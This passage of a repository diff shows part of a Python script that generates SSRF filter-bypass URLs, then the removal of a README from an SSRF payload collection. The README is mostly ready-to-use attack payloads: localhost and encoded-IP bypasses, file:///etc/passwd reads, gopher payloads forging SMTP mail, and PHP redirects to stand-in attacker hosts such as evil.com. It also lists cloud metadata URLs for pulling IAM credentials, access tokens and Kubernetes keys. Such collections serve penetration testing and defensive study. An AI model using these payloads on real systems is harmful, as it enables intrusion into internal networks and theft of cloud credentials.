print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IP12,':',PORT,'/',file=f,sep='')
print('http://',IP12,':',PORT,'?@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP12,':',PORT,'#@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',IP12,':',PORT,'+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',IP12,':','+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDPREFIXTEXT,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',file=f,sep='')
print('http://',RANDPREFIXTEXTSPEC,'@',RANDOMPREFIXVALIDSITE,'@',IP12,':',PORT,'/',file=f,sep='')
print('http://',IP12,':',PORT,'+&@',RANDOMPREFIXVALIDSITE,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',IP12,':',PORT,'#+@',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',RANDOMPREFIXVALIDSITE,'+&@',RANDOMPREFIXVALIDSITE,'#+@',IP12,':',PORT,'/',file=f,sep='')
print('http://',IP12,':',PORT,':80','/',file=f,sep='')
print('http://',IP12,':',PORT,'\\t',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP12,':',PORT,'%09',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
print('http://',IP12,':',PORT,'%2509',RANDOMPREFIXVALIDSITE,'/',file=f,sep='')
#Case 13 - Abusing IDNA Standard
print(bluecolor,"Abusing IDNA Standard: ",resetcolor,yellowcolor,"http://ß.localdomain.pw/", resetcolor,' -> ',yellowcolor,'http://cc.localdomain.pw/',resetcolor,' => ',bluecolor,'DNS',resetcolor,' => ',yellowcolor,'127.127.127.127',resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print('http://ß.localdomain.pw/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://ß.localdomain.pw/',file=f,sep='')
#Case 14 - Abusing 。and 。
IPAddressParts = arg1.split(".")
print(bluecolor,"Abusing 。and 。: ",resetcolor,yellowcolor,"http://",IPAddressParts[0],"",IPAddressParts[1],"",IPAddressParts[2],"",IPAddressParts[3],"/",resetcolor," and " ,yellowcolor,"http://",IPAddressParts[0],"",IPAddressParts[1],"",IPAddressParts[2],"",IPAddressParts[3],"/", resetcolor,' -> ',yellowcolor,"http://",IPAddressParts[0],".",IPAddressParts[1],".",IPAddressParts[2],".",IPAddressParts[3],"/",resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print('http://',IPAddressParts[0],'',IPAddressParts[1],'',IPAddressParts[2],'',IPAddressParts[3],'/',sep='')
print('http://',IPAddressParts[0],'',IPAddressParts[1],'',IPAddressParts[2],'',IPAddressParts[3],'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',IPAddressParts[0],'',IPAddressParts[1],'',IPAddressParts[2],'',IPAddressParts[3],'/',file=f,sep='')
print('http://',IPAddressParts[0],'',IPAddressParts[1],'',IPAddressParts[2],'',IPAddressParts[3],'/',file=f,sep='')
#Case 15 Abusing Enclosed Alphanumerics
print(bluecolor,"Abusing Enclosed Alphanumerics:",resetcolor," ",yellowcolor,'http://',convertIP2EnclosedAlphanumericsValue(), resetcolor,' -> ',yellowcolor,"http://",arg1,resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print('http://',convertIP2EnclosedAlphanumericsValue(),'/',sep='')
print('http://',convert_ip(IP1),':',PORT,'/',sep='')
print('http://',convert_ip(IP2),':',PORT,'/',sep='')
print('http://',convert_ip(IP3),':',PORT,'/',sep='')
print('http://',convert_ip(IP4),':',PORT,'/',sep='')
print('http://',convert_ip(IP5),':',PORT,'/',sep='')
print('http://',convert_ip(IP6),':',PORT,'/',sep='')
print('http://',convert_ip(IP7),':',PORT,'/',sep='')
print('http://',convert_ip(IP8),':',PORT,'/',sep='')
print('http://',convert_ip(IP9),':',PORT,'/',sep='')
print('http://',convert_ip(IP10),':',PORT,'/',sep='')
print('http://',convert_ip(IP11),':',PORT,'/',sep='')
print('http://',convert_ip(IP12),':',PORT,'/',sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("\n",sep='')
if EXPORTRESULTS == 'export':
print('http://',convertIP2EnclosedAlphanumericsValue(),'/',file=f,sep='')
print('http://',convert_ip(IP1),':',PORT,'/',file=f,sep='')
print('http://',convert_ip(IP2),':',PORT,'/',file=f,sep='')
print('http://',convert_ip(IP3),':',PORT,'/',file=f,sep='')
print('http://',convert_ip(IP4),':',PORT,'/',file=f,sep='')
print('http://',convert_ip(IP5),':',PORT,'/',file=f,sep='')
print('http://',convert_ip(IP6),':',PORT,'/',file=f,sep='')
print('http://',convert_ip(IP7),':',PORT,'/',file=f,sep='')
print('http://',convert_ip(IP8),':',PORT,'/',file=f,sep='')
print('http://',convert_ip(IP9),':',PORT,'/',file=f,sep='')
print('http://',convert_ip(IP10),':',PORT,'/',file=f,sep='')
print('http://',convert_ip(IP11),':',PORT,'/',file=f,sep='')
print('http://',convert_ip(IP12),':',PORT,'/',file=f,sep='')
if EXPORTRESULTS == 'export':
f.close()
print("\n",bluecolor,'-----------------------------------------------------------------------------------------------------------------------------------------',resetcolor,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print("Results are exported to: " + FILENAME,sep='')
print(greencolor,'=========================================================================================================================================',resetcolor,sep='')
print(bluecolor,'-----------------------------------------------------------------------------------------------------------------------------------------',resetcolor,sep='')
print("\n",sep='')

BIN
Server Side Request Forgery/Images/Parser & Curl < 7.54.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 179 KiB

BIN
Server Side Request Forgery/Images/SSRF_Parser.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 381 KiB

BIN
Server Side Request Forgery/Images/SSRF_stream.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 67 KiB

BIN
Server Side Request Forgery/Images/WeakParser.jpg
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 106 KiB

514
Server Side Request Forgery/README.md
View File

@@ -1,514 +0,0 @@
# Server-Side Request Forgery
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
## Summary
* [Tools](#tools)
* [Payloads with localhost](#payloads-with-localhost)
* [Bypassing filters](#bypassing-filters)
* [SSRF exploitation via URL Scheme](#ssrf-exploitation-via-url-scheme)
* [SSRF to XSS](#ssrf-to-xss-by-d0rkerdevil--alyssaoherrera)
* [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances)
* [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket)
* [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud)
* [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean)
* [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud)
* [SSRF URL for Azure](#ssrf-url-for-azure)
* [SSRF URL for OpenStack/RackSpace](#ssrf-url-for-openstackrackspace)
* [SSRF URL for HP Helion](#ssrf-url-for-hp-helion)
* [SSRF URL for Oracle Cloud](#ssrf-url-for-oracle-cloud)
* [SSRF URL for Kubernetes ETCD](#ssrf-url-for-kubernetes-etcd)
* [SSRF URL for Alibaba](#ssrf-url-for-alibaba)
* [SSRF URL for Docker](#ssrf-url-for-docker)
* [SSRF URL for Rancher](#ssrf-url-for-rancher)
## Tools
- [SSRFmap - https://github.com/swisskyrepo/SSRFmap](https://github.com/swisskyrepo/SSRFmap)
- [Gopherus - https://github.com/tarunkant/Gopherus](https://github.com/tarunkant/Gopherus)
## Payloads with localhost
Basic SSRF v1
```powershell
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://0.0.0.0:80
http://0.0.0.0:443
http://0.0.0.0:22
```
Basic SSRF - Alternative version
```powershell
http://localhost:80
http://localhost:443
http://localhost:22
```
Advanced exploit using a redirection
```powershell
1. Create a subdomain pointing to 192.168.0.1 with DNS A record e.g:ssrf.example.com
2. Launch the SSRF: vulnerable.com/index.php?url=http://YOUR_SERVER_IP
vulnerable.com will fetch YOUR_SERVER_IP which will redirect to 192.168.0.1
```
Advanced exploit using type=url
```powershell
Change "type=file" to "type=url"
Paste URL in text field and hit enter
Using this vulnerability users can upload images from any image URL = trigger an SSRF
```
## Bypassing filters
Bypass using HTTPS
```powershell
https://127.0.0.1/
https://localhost/
```
Bypass localhost with [::]
```powershell
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:22/ SSH
http://[::]:3128/ Squid
```
```powershell
http://0000::1:80/
http://0000::1:25/ SMTP
http://0000::1:22/ SSH
http://0000::1:3128/ Squid
```
Bypass localhost with a domain redirecting to locahost
```powershell
http://localtest.me
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost
http://bugbounty.dod.network redirect to 127.0.0.2 == localhost
```
The service nip.io is awesome for that, it will convert any ip address as a dns.
```powershell
NIP.IO maps <anything>.<IP Address>.nip.io to the corresponding <IP Address>, even 127.0.0.1.nip.io maps to 127.0.0.1
```
Bypass localhost with CIDR : 127.x.x.x
```powershell
it's a /8
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0
```
Bypass using a decimal ip location
```powershell
http://0177.0.0.1/
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
```
Bypass using malformed urls
```powershell
localhost:+11211aaa
localhost:00011211aaaa
```
Bypass using rare address
```powershell
http://0/
```
Bypass using bash variables (curl only)
```powershell
curl -v "http://evil$google.com"
$google = ""
```
Bypass using tricks combination
```powershell
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
urllib2 : 1.1.1.1
requests + browsers : 2.2.2.2
urllib : 3.3.3.3
```
Bypass using enclosed alphanumerics [@EdOverflow](https://twitter.com/EdOverflow)
```powershell
http://. = example.com
List:
```
Bypass filter_var() php function
```powershell
0://evil.com:80;http://google.com:80/
```
Bypass against a weak parser - by Orange Tsai ([Blackhat A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf](https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf))
```powershell
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/
```
![https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_Parser.png](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/WeakParser.jpg)
## SSRF exploitation via URL Scheme
File : allows an attacker to fetch the content of a file on the server
```powershell
file://path/to/file
file:///etc/passwd
file://\/\/etc/passwd
ssrf.php?url=file:///etc/passwd
```
Http: allows an attacker to fetch any content from the web, it can also be used to scan ports.
```powershell
ssrf.php?url=http://127.0.0.1:22
ssrf.php?url=http://127.0.0.1:80
ssrf.php?url=http://127.0.0.1:443
```
![SSRF stream](https://github.com/swisskyrepo/PayloadsAllTheThings/raw/master/SSRF%20injection/Images/SSRF_stream.png)
The following URL scheme can be used to probe the network
Dict : the DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol:
```powershell
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
```
Sftp : a network protocol used for secure file transfer over secure shell
```powershell
ssrf.php?url=sftp://evil.com:11111/
```
Tftp : Trivial File Transfer Protocol, works over UDP
```powershell
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
```
Ldap : Lightweight Directory Access Protocol. It is an application protocol used over an IP network to manage and access the distributed directory information service.
```powershell
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
```
Gopher
```powershell
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AH
You didn't say the magic word !
.
QUIT
```
Gopher SMTP - Back connect to 1337
```php
Content of evil.com/redirect.php:
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>
Now query it.
https://example.com/?q=http://evil.com/redirect.php.
```
Gopher SMTP - send a mail
```php
Content of evil.com/redirect.php:
<?php
$commands = array(
'HELO victim.com',
'MAIL FROM: <admin@victim.com>',
'RCPT To: <sxcurity@oou.us>',
'DATA',
'Subject: @sxcurity!',
'Corben was here, woot woot!',
'.'
);
$payload = implode('%0A', $commands);
header('Location: gopher://0:25/_'.$payload);
?>
```
## SSRF to XSS by [@D0rkerDevil & @alyssa.o.herrera](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
```bash
http://brutelogic.com.br/poc.svg -> simple alert
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri= -> simple ssrf
https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brutelogic.com.br/poc.svg
```
## SSRF URL for Cloud Instances
### SSRF URL for AWS Bucket
[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
Interesting path to look for at `http://169.254.169.254`
```powershell
Always here : /latest/meta-data/{hostname,public-ipv4,...}
User data (startup script for auto-scaling) : /latest/user-data
Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
```
DNS record
```powershell
http://169.254.169.254
http://metadata.nicob.net/
http://169.254.169.254.xip.io/
http://1ynrnhl.xip.io/
http://www.owasp.org.1ynrnhl.xip.io/
```
HTTP redirect
```powershell
Static:http://nicob.net/redir6a
Dynamic:http://nicob.net/redir-http-169.254.169.254:80-
```
Alternate IP encoding
```powershell
http://425.510.425.510/ Dotted decimal with overflow
http://2852039166/ Dotless decimal
http://7147006462/ Dotless decimal with overflow
http://0xA9.0xFE.0xA9.0xFE/ Dotted hexadecimal
http://0xA9FEA9FE/ Dotless hexadecimal
http://0x41414141A9FEA9FE/ Dotless hexadecimal with overflow
http://0251.0376.0251.0376/ Dotted octal
http://0251.00376.000251.0000376/ Dotted octal with padding
```
More urls to include
```powershell
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
```
E.g: Jira SSRF leading to AWS info disclosure - `https://help.redacted.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/metadata/v1/maintenance`
E.g2: Flaws challenge - `http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/`
### SSRF URL for Google Cloud
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True"
```powershell
http://169.254.169.254/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/
http://metadata/computeMetadata/v1/
http://metadata.google.internal/computeMetadata/v1/instance/hostname
http://metadata.google.internal/computeMetadata/v1/instance/id
http://metadata.google.internal/computeMetadata/v1/project/project-id
```
Google allows recursive pulls
```powershell
http://metadata.google.internal/computeMetadata/v1/instance/disks/?recursive=true
```
Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
```powershell
http://metadata.google.internal/computeMetadata/v1beta1/
http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
```
Interesting files to pull out:
- SSH Public Key : `http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json`
- Get Access Token : `http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token`
- Kubernetes Key : `http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json`
### SSRF URL for Digital Ocean
Documentation available at `https://developers.digitalocean.com/documentation/metadata/`
```powershell
curl http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
All in one request:
curl http://169.254.169.254/metadata/v1.json | jq
```
### SSRF URL for Packetcloud
Documentation available at `https://metadata.packet.net/userdata`
### SSRF URL for Azure
Limited, maybe more exists? `https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/`
```powershell
http://169.254.169.254/metadata/v1/maintenance
```
Update Apr 2017, Azure has more support; requires the header "Metadata: true" `https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service`
```powershell
http://169.254.169.254/metadata/instance?api-version=2017-04-02
http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
```
### SSRF URL for OpenStack/RackSpace
(header required? unknown)
```powershell
http://169.254.169.254/openstack
```
### SSRF URL for HP Helion
(header required? unknown)
```powershell
http://169.254.169.254/2009-04-04/meta-data/
```
### SSRF URL for Oracle Cloud
```powershell
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
```
### SSRF URL for Alibaba
```powershell
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
```
### SSRF URL for Kubernetes ETCD
Can contain API keys and internal ip and ports
```powershell
curl -L http://127.0.0.1:2379/version
curl http://127.0.0.1:2379/v2/keys/?recursive=true
```
### SSRF URL for Docker
```powershell
http://127.0.0.1:2375/v1.24/containers/json
Simple example
docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
```
### SSRF URL for Rancher
```powershell
curl http://rancher-metadata/<version>/<path>
```
More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/
## References
- [Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13](https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/)
- [ESEA Server-Side Request Forgery and Querying AWS Meta Data](http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/) by Brett Buerhaus
- [SSRF and local file read in video to gif converter](https://hackerone.com/reports/115857)
- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
- [SSRF in proxy.duckduckgo.com](https://hackerone.com/reports/358119)
- [Blind SSRF on errors.hackerone.net](https://hackerone.com/reports/374737)
- [SSRF on *shopifycloud.com](https://hackerone.com/reports/382612)
- [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
- [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
- [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
- [#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai](https://www.youtube.com/watch?v=D1S-G8rJrEk)
- [SSRF Tips - xl7dev](http://blog.safebuff.com/2016/07/03/SSRF-Tips/)
- [SSRF in https://imgur.com/vidgif/url](https://hackerone.com/reports/115748)
- [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/)
- [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf)
- [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow)
- [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/)
- [PHP SSRF @secjuice](https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51)
- [How I convert SSRF to xss in a ssrf vulnerable Jira](https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158)
- [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a)
- [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8)
- [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/)
- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978)
- [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/)